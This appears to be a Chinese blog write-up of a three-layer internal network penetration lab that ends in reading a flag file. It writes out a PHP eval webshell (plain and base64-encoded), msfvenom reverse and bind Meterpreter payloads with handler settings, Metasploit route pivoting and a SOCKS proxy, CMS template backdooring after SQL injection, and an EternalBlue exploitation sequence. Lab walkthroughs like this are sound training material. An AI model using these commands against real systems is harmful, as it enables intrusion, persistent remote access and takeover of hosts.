三层内网渗透

拓扑图:
在这里插入图片描述对target1进行攻击
用nmap扫描发现192.168.33.138网站开放80端口
在这里插入图片描述网站用php v5.0版本存在漏洞用thinkphp 探测发现确实存在漏洞
在这里插入图片描述用thinkphp写入一句话木马:
echo “<?php @eval($_POST['cmd']);?>” >shell.php当写入一句话木马时候发现报错,cat shell.php 查看一下发现因为过滤了post
我们用base64重新编码上传
echo “PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=” |base64-d >shell.php
在这里插入图片描述用蚁剑连接上去,现在我们已经拿到了target1这台服务器的web权限
在这里插入图片描述使用msf
生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.33.128 LPORT=1111 -f elf >t1.elf

接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.33.128
set LPORT 1111
exploit
在这里插入图片描述用蚁剑把msf生成木马上传到网站目录,在蚁剑里面将文件设置一个可执行权限,这样文件就可以执行上线了
在这里插入图片描述可以看到msf里面已经返回会话了可以看到权限是低权限,我们先不提权继续渗透
在这里插入图片描述

信息收集及配置访问
获取网络接口:run get_local_subnets //发现由两张网卡
查看路由地址:run auto route -p
添加路由地址:run autoroute -s 192.168.22.0/24 //这样保证我们kali主机对22网段的主机有权限操作了
在这里插入图片描述开启本地代理:(创建SOCK5协议代理)(因为有时候kali上面没有好用的工具,需要用windows系统所以我们开一个代理)
use auxiliary/server/socks5
set srvport 2222
exploit
vim /etc/proxychains4.conf
打开配置为文件将这里改成刚才设置的地址和端口
在这里插入图片描述对target2进行攻击
然后开代理去扫描(为了节省时间就不扫c段了原则上应该扫描c段去探测)
在这里插入图片描述在windows上挂代理
在这里插入图片描述走代理访问192.168.22.128
在这里插入图片描述通过这个cms的sql注入漏洞拿到账号密码
账号:admin
密码:123qwe
通过查找robots.txt拿到后台登录地址
在这里插入图片描述登录到后台我们最关注的点就是模板,发现有修改模板功能
在这里插入图片描述随便找一个php文件写入后门代码
在这里插入图片描述默认index.php指向这里
在这里插入图片描述走代理用菜刀连接webshell
在这里插入图片描述这样我们现在获取到了target2的webshell权限
在这里插入图片描述然后上传一个正向的webshell因为刚才target2上没有192.168.22网段的网卡所以不能上传反向的木马,如果生成之前payload绑定的46木马,木马反向连接不上,所以用正向木马因为kali已经添加了22网段的路由
生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
上传到菜刀
在这里插入图片描述访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
在这里插入图片描述信息收集及配置访问
获取网络接口:run get_local_subnets //可以看到有两张网卡
在这里插入图片描述查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.44.0/24
在这里插入图片描述对target3进行攻击
用nmap扫描这张网卡 nmap 192.168.44.0/24
发现: 192.168.44.33
使用ms17_010探测模块 use auxiliary/scanner/smb/smb_ms17_010
在这里插入图片描述set payload windows/meterpreter/bind_tcp //正向连接(因为不设置正向连接,他本来反向连接paload会连接kali的网卡这样连接不上)

use exploit/windows/smb/ms17_010_eternalblue//利用漏洞
set RHOSTS 192.168.33.33 //攻击目标
exploit
shell
dir /S flag.txt /B
type C:\Users\Administrator\Desktop\flag.txt
这样我们就拿到了target3的操作系统权限成功上线target3
在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值